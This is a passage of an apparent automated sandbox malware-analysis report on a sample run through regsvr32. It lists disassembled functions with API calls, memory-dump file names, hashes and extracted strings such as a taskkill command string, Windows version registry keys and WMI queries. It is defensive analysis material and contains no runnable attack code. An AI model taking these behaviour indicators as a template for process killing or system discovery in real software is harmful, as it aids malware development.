                                                                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,00000008,?,?,?,?,00000000,00007FFB9904C9C0), ref: 00007FFB9904B7D1
                                                                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,00000008,?,?,?,?,00000000,00007FFB9904C9C0), ref: 00007FFB9904B881
                                                                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,00000008,?,?,?,?,00000000,00007FFB9904C9C0), ref: 00007FFB9904B92D
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.102062619138.00007FFB98FF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB98FF0000, based on PE: true
                                                                                • Associated: 0000000E.00000002.102062549180.00007FFB98FF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062935640.00007FFB990F2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062979701.00007FFB990F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063159095.00007FFB991A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063200271.00007FFB991A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063242752.00007FFB991A6000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063289349.00007FFB991A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ffb98ff0000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: memcpy
                                                                                • String ID:
                                                                                • API String ID: 3510742995-0
                                                                                • Opcode ID: a02889e561553ea157a5a03a345de5cd6e001513076a317177940a5da48adae8
                                                                                • Instruction ID: a8bf2f89aae0bb0c23c8ce8fe2735b3892d80b3398be7323634a1669d9da4a17
                                                                                • Opcode Fuzzy Hash: a02889e561553ea157a5a03a345de5cd6e001513076a317177940a5da48adae8
                                                                                • Instruction Fuzzy Hash: D3E1825291CAC691E6715F39E0013FAA7A0FF95344F159121EECD12A9AEF3DE6C6CB00
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.102062619138.00007FFB98FF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB98FF0000, based on PE: true
                                                                                • Associated: 0000000E.00000002.102062549180.00007FFB98FF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062935640.00007FFB990F2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062979701.00007FFB990F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063159095.00007FFB991A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063200271.00007FFB991A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063242752.00007FFB991A6000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063289349.00007FFB991A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ffb98ff0000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: Handle$CloseFile$CreateErrorInformationLastMappingView
                                                                                • String ID:
                                                                                • API String ID: 2964106993-0
                                                                                • Opcode ID: 59f6d28cb9eff2efd9aa7f8cbaf80cac8ec03e00fa82fb82abe355b06160ade3
                                                                                • Instruction ID: b1cbf40e6a7c435a4e8f4102084ff2b5ba075f400f7f36b195c3832f0c9bed4e
                                                                                • Opcode Fuzzy Hash: 59f6d28cb9eff2efd9aa7f8cbaf80cac8ec03e00fa82fb82abe355b06160ade3
                                                                                • Instruction Fuzzy Hash: 2C61BEB2B1A75285FBB8DF62E4493AD27A0BB45B84F598039DE6C07B85DF3CD0428740
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.102062619138.00007FFB98FF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB98FF0000, based on PE: true
                                                                                • Associated: 0000000E.00000002.102062549180.00007FFB98FF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062935640.00007FFB990F2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062979701.00007FFB990F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063159095.00007FFB991A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063200271.00007FFB991A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063242752.00007FFB991A6000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063289349.00007FFB991A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ffb98ff0000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: Value
                                                                                • String ID: None$SomeBroadcastContext
                                                                                • API String ID: 3702945584-174103366
                                                                                • Opcode ID: 6d928adf873051dbf801eeef9e6ebbcaabe82b64e8f70111deb873f171dda760
                                                                                • Instruction ID: 85fd47e8c9d2108b1991ba775adf2cf9fefcc56e5381c799765f835b852024de
                                                                                • Opcode Fuzzy Hash: 6d928adf873051dbf801eeef9e6ebbcaabe82b64e8f70111deb873f171dda760
                                                                                • Instruction Fuzzy Hash: EA31C3A1F0A26352FBB59F39D4003BD2B95AF85B80F484435CFAD47782EE2CE8458380
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.102062619138.00007FFB98FF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB98FF0000, based on PE: true
                                                                                • Associated: 0000000E.00000002.102062549180.00007FFB98FF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062935640.00007FFB990F2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062979701.00007FFB990F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063159095.00007FFB991A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063200271.00007FFB991A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063242752.00007FFB991A6000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063289349.00007FFB991A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ffb98ff0000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: Value
                                                                                • String ID:
                                                                                • API String ID: 3702945584-0
                                                                                • Opcode ID: 2b1b165d566399e075e40cc15f4da751a8b31a647fc9875ee39daf97d25330b8
                                                                                • Instruction ID: 88a8a88f349bda249b52fd261b4e3ffcb142a37e369551c02af4542109c5972e
                                                                                • Opcode Fuzzy Hash: 2b1b165d566399e075e40cc15f4da751a8b31a647fc9875ee39daf97d25330b8
                                                                                • Instruction Fuzzy Hash: 0F41A2A1B0A65741FAF56F36C5043BD6796AF84B80F588435DEAC073C2EE2DE8425780
                                                                                APIs
                                                                                Strings
                                                                                • a Display implementation returned an error unexpectedly/rustc/f6e511eec7342f59a25f7c0534f1dbea00d01b14\library\alloc\src\string.rs, xrefs: 00007FFB99012DBC
                                                                                • taskkill.exe/PID/FUnable to read process memory informationReadProcessMemory returned unexpected number of bytes readUnable to read process dataC:\Users\win10-x64\.cargo\registry\src\index.crates.io-6f17d22bba15001f\sysinfo-0.32.1\src\windows\process.rs, xrefs: 00007FFB99012AAB
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.102062619138.00007FFB98FF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB98FF0000, based on PE: true
                                                                                • Associated: 0000000E.00000002.102062549180.00007FFB98FF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062935640.00007FFB990F2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062979701.00007FFB990F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063159095.00007FFB991A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063200271.00007FFB991A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063242752.00007FFB991A6000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063289349.00007FFB991A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ffb98ff0000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: CloseHandle$memcpy
                                                                                • String ID: a Display implementation returned an error unexpectedly/rustc/f6e511eec7342f59a25f7c0534f1dbea00d01b14\library\alloc\src\string.rs$taskkill.exe/PID/FUnable to read process memory informationReadProcessMemory returned unexpected number of bytes readUnable to read process dataC:\Users\win10-x64\.cargo\registry\src\index.crates.io-6f17d22bba15001f\sysinfo-0.32.1\src\windows\process.rs
                                                                                • API String ID: 2397262393-2446203462
                                                                                • Opcode ID: 7b7f5add01740111e04b420036e22f845c9a544211ef10a65f11276e7dc3752c
                                                                                • Instruction ID: 5ee7227eb6737ca4b2583e43fca3984f9f1d182b3db3c4b24d8344dcd1549a9a
                                                                                • Opcode Fuzzy Hash: 7b7f5add01740111e04b420036e22f845c9a544211ef10a65f11276e7dc3752c
                                                                                • Instruction Fuzzy Hash: 16817FB2A0C69381FAB09F25E0403BAA761FB85BC4F548431DA9D47B99DF2DE545CB40
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.102062619138.00007FFB98FF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB98FF0000, based on PE: true
                                                                                • Associated: 0000000E.00000002.102062549180.00007FFB98FF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062935640.00007FFB990F2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062979701.00007FFB990F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063159095.00007FFB991A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063200271.00007FFB991A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063242752.00007FFB991A6000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063289349.00007FFB991A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ffb98ff0000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: memcpy
                                                                                • String ID: assertion failed: match track_edge_idx { LeftOrRight::Left(idx) => idx <= old_left_len, LeftOrRight::Right(idx) => idx <= right_len,}$assertion failed: new_left_len <= CAPACITY$assertion failed: old_left_len + count <= CAPACITY
                                                                                • API String ID: 3510742995-3535459961
                                                                                • Opcode ID: ec31e2d2f2d238cb682712fc6711d5b6d7bf013a2ad97fdad6d88c0750e46674
                                                                                • Instruction ID: e009103936753179d9f0fe24c0fa474bf12d9f7ebd885a386a70b9ffb67ede32
                                                                                • Opcode Fuzzy Hash: ec31e2d2f2d238cb682712fc6711d5b6d7bf013a2ad97fdad6d88c0750e46674
                                                                                • Instruction Fuzzy Hash: 7B916B72A04BD695E7618F39D8403F933A8FB58B88F548226DE9C17759EF39D296C300
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.102062619138.00007FFB98FF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB98FF0000, based on PE: true
                                                                                • Associated: 0000000E.00000002.102062549180.00007FFB98FF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062935640.00007FFB990F2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062979701.00007FFB990F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063159095.00007FFB991A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063200271.00007FFB991A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063242752.00007FFB991A6000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063289349.00007FFB991A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ffb98ff0000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: Group$BufferEnumFreeInfo
                                                                                • String ID:
                                                                                • API String ID: 1408970584-0
                                                                                • Opcode ID: f535396f361f033fcce0411874c04eff62e223ab21637c311a4ac9a64a1c0193
                                                                                • Instruction ID: 2f190bf587ba2a6202e9bcb3f20a7ddd5a33f5df1d7a55a0b5c5c51165a1ab8e
                                                                                • Opcode Fuzzy Hash: f535396f361f033fcce0411874c04eff62e223ab21637c311a4ac9a64a1c0193
                                                                                • Instruction Fuzzy Hash: 0561A0B3B09A4285FAA08F21E0553AAB7A0FB86B94F544432EF9D47794DF3DD441CB40
                                                                                APIs
                                                                                • GetOverlappedResult.KERNEL32(?,?,00000000,?,00007FFB9905A554,?,00000000,?,00007FFB9909C5FA), ref: 00007FFB9909C951
                                                                                • GetLastError.KERNEL32(?,?,00000000,?,00007FFB9905A554,?,00000000,?,00007FFB9909C5FA), ref: 00007FFB9909C96E
                                                                                • GetLastError.KERNEL32(?,?,00000000,?,00007FFB9905A554,?,00000000,?,00007FFB9909C5FA), ref: 00007FFB9909C9CC
                                                                                • CompareStringOrdinal.KERNEL32 ref: 00007FFB9909CA39
                                                                                • GetLastError.KERNEL32 ref: 00007FFB9909CA4E
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.102062619138.00007FFB98FF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB98FF0000, based on PE: true
                                                                                • Associated: 0000000E.00000002.102062549180.00007FFB98FF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062935640.00007FFB990F2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062979701.00007FFB990F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063159095.00007FFB991A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063200271.00007FFB991A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063242752.00007FFB991A6000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063289349.00007FFB991A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ffb98ff0000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast$CompareOrdinalOverlappedResultString
                                                                                • String ID:
                                                                                • API String ID: 1037094402-0
                                                                                • Opcode ID: 1cf5f00d355b873c883229a0c6ee4e22e118a48df04c41a706570ea8908b121b
                                                                                • Instruction ID: f7a371b18edcad62162cd08941db48c77ba5196a5c26c4e5a8a2113fb78909bb
                                                                                • Opcode Fuzzy Hash: 1cf5f00d355b873c883229a0c6ee4e22e118a48df04c41a706570ea8908b121b
                                                                                • Instruction Fuzzy Hash: 42416AA2E09B628AE7A09F65D4043BC27A0FB49B88F548531DE9D47796DF3DE581C300
                                                                                APIs
                                                                                Strings
                                                                                • SOFTWARE\Microsoft\Windows NT\CurrentVersionProductNameWindows 10 Windows 11 CurrentBuildNumberCurrentMajorVersionNumber (), xrefs: 00007FFB990163FC
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.102062619138.00007FFB98FF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB98FF0000, based on PE: true
                                                                                • Associated: 0000000E.00000002.102062549180.00007FFB98FF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062935640.00007FFB990F2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062979701.00007FFB990F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063159095.00007FFB991A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063200271.00007FFB991A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063242752.00007FFB991A6000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063289349.00007FFB991A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ffb98ff0000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: CloseQueryValue
                                                                                • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersionProductNameWindows 10 Windows 11 CurrentBuildNumberCurrentMajorVersionNumber ()
                                                                                • API String ID: 3356406503-1421764643
                                                                                • Opcode ID: b588b0cde5a49fd7dc7e149ecc75e68b2c8835f15c7b88b7da5c6959cc8e6800
                                                                                • Instruction ID: 5fe1acab85aa856317bec2e53e1c81c267ba82db92cb5490af93eff34ff19984
                                                                                • Opcode Fuzzy Hash: b588b0cde5a49fd7dc7e149ecc75e68b2c8835f15c7b88b7da5c6959cc8e6800
                                                                                • Instruction Fuzzy Hash: 22B182B2619B4281EBB09F21E8403AAB7A0FB85BD4F549135EADD47B99DF3DD045CB00
                                                                                APIs
                                                                                Strings
                                                                                • SOFTWARE\Microsoft\Windows NT\CurrentVersionProductNameWindows 10 Windows 11 CurrentBuildNumberCurrentMajorVersionNumber (), xrefs: 00007FFB99015B5E
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.102062619138.00007FFB98FF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB98FF0000, based on PE: true
                                                                                • Associated: 0000000E.00000002.102062549180.00007FFB98FF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062935640.00007FFB990F2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062979701.00007FFB990F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063159095.00007FFB991A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063200271.00007FFB991A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063242752.00007FFB991A6000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063289349.00007FFB991A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ffb98ff0000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: CloseOpenQueryValue
                                                                                • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersionProductNameWindows 10 Windows 11 CurrentBuildNumberCurrentMajorVersionNumber ()
                                                                                • API String ID: 3677997916-1421764643
                                                                                • Opcode ID: bbd7c08a1900d0b7843992360e1c46343e0f48297b867da653f781d5e8ba3327
                                                                                • Instruction ID: 118214d235b6e437a4a852f7bdf0c0db11caa1b6e4c03b6d633768e5685595a0
                                                                                • Opcode Fuzzy Hash: bbd7c08a1900d0b7843992360e1c46343e0f48297b867da653f781d5e8ba3327
                                                                                • Instruction Fuzzy Hash: DE8155B261DB8285EBB08F25E4443AAB7A5FB847C0F509035EA9D47BA9DF7DD144CB00
                                                                                APIs
                                                                                • TlsAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FFB990ADBD5,?,?,?), ref: 00007FFB990A7963
                                                                                • InitOnceComplete.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FFB990ADBD5,?,?,?), ref: 00007FFB990A79AE
                                                                                Strings
                                                                                • assertion failed: len >= mem::size_of::<c::sockaddr_in6>(), xrefs: 00007FFB990A7B68
                                                                                • assertion failed: len >= mem::size_of::<c::sockaddr_in>()std\src\sys_common\net.rs, xrefs: 00007FFB990A7B50
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.102062619138.00007FFB98FF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB98FF0000, based on PE: true
                                                                                • Associated: 0000000E.00000002.102062549180.00007FFB98FF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062935640.00007FFB990F2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062979701.00007FFB990F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063159095.00007FFB991A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063200271.00007FFB991A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063242752.00007FFB991A6000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063289349.00007FFB991A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ffb98ff0000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: AllocCompleteInitOnce
                                                                                • String ID: assertion failed: len >= mem::size_of::<c::sockaddr_in6>()$assertion failed: len >= mem::size_of::<c::sockaddr_in>()std\src\sys_common\net.rs
                                                                                • API String ID: 622421136-3544120690
                                                                                • Opcode ID: eb1f3e42467e61f710f7c07e960d639c2e60f659cf9bf10163ae456fe855a410
                                                                                • Instruction ID: a7e022cc8efcac2d14b5aeedb917ba10c4b2717d7e5ce7eb3306514d2fd8b267
                                                                                • Opcode Fuzzy Hash: eb1f3e42467e61f710f7c07e960d639c2e60f659cf9bf10163ae456fe855a410
                                                                                • Instruction Fuzzy Hash: 0771EDB2E196939AE7A4CF39E4043AC37A4FB44758F65813ADA5C43691DF38E981C380
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.102062619138.00007FFB98FF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB98FF0000, based on PE: true
                                                                                • Associated: 0000000E.00000002.102062549180.00007FFB98FF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062935640.00007FFB990F2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062979701.00007FFB990F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063159095.00007FFB991A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063200271.00007FFB991A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063242752.00007FFB991A6000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063289349.00007FFB991A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ffb98ff0000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: String$AllocFreeUninitialize
                                                                                • String ID: root\WMI
                                                                                • API String ID: 3290083200-2712063579
                                                                                • Opcode ID: 98c0269dfcd0378be498eda70be19ca3c844e572e12d16cecb35d9e0ee934403
                                                                                • Instruction ID: 9b588d701919ab9a84708992d52191cfcf0a7376e36d598d8bfbc331b1fe0ad6
                                                                                • Opcode Fuzzy Hash: 98c0269dfcd0378be498eda70be19ca3c844e572e12d16cecb35d9e0ee934403
                                                                                • Instruction Fuzzy Hash: F8413C72508B8292FAB19F21F4513AAB7A0FB86394F444035EBDD46BA6DF7CE185C740
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.102062619138.00007FFB98FF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB98FF0000, based on PE: true
                                                                                • Associated: 0000000E.00000002.102062549180.00007FFB98FF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062935640.00007FFB990F2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062979701.00007FFB990F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063159095.00007FFB991A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063200271.00007FFB991A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063242752.00007FFB991A6000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063289349.00007FFB991A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ffb98ff0000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: CloseCounterQueryRemove
                                                                                • String ID: LoadUpdateEvent$\System\Cpu Queue Length
                                                                                • API String ID: 2370987109-2417354242
                                                                                • Opcode ID: 647fd8146301dadc266ba3f194bac3f57832ee19224204e46d22680d94dfee08
                                                                                • Instruction ID: a467dbe5750730ce04b4b9c2284b6cd0115249a249e37cc3354c62e201f38830
                                                                                • Opcode Fuzzy Hash: 647fd8146301dadc266ba3f194bac3f57832ee19224204e46d22680d94dfee08
                                                                                • Instruction Fuzzy Hash: 034181B290C69342E6B0DF71E4503AEA7A0EF84390F905131E7AE86AD6DF7CD0458B44
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.102062619138.00007FFB98FF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB98FF0000, based on PE: true
                                                                                • Associated: 0000000E.00000002.102062549180.00007FFB98FF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062935640.00007FFB990F2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062979701.00007FFB990F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063159095.00007FFB991A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063200271.00007FFB991A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063242752.00007FFB991A6000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063289349.00007FFB991A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ffb98ff0000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: memcpy$memset
                                                                                • String ID:
                                                                                • API String ID: 438689982-0
                                                                                • Opcode ID: a00c8f0ca6024f96ada60d7045ffeefa70fc244fcdb3035eea65725a3636ee6f
                                                                                • Instruction ID: a6e7b6938ff65e18a9574c78acb39341c43bf64f0727d8eb0068be191d8a6877
                                                                                • Opcode Fuzzy Hash: a00c8f0ca6024f96ada60d7045ffeefa70fc244fcdb3035eea65725a3636ee6f
                                                                                • Instruction Fuzzy Hash: 9B02C0A260C2C18AE7758735E0183AFBF91E7127A8F885264D7FA0A3C7CB7DE1058755
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.102062619138.00007FFB98FF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB98FF0000, based on PE: true
                                                                                • Associated: 0000000E.00000002.102062549180.00007FFB98FF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062935640.00007FFB990F2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062979701.00007FFB990F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063159095.00007FFB991A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063200271.00007FFB991A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063242752.00007FFB991A6000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063289349.00007FFB991A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ffb98ff0000_regsvr32.jbxd
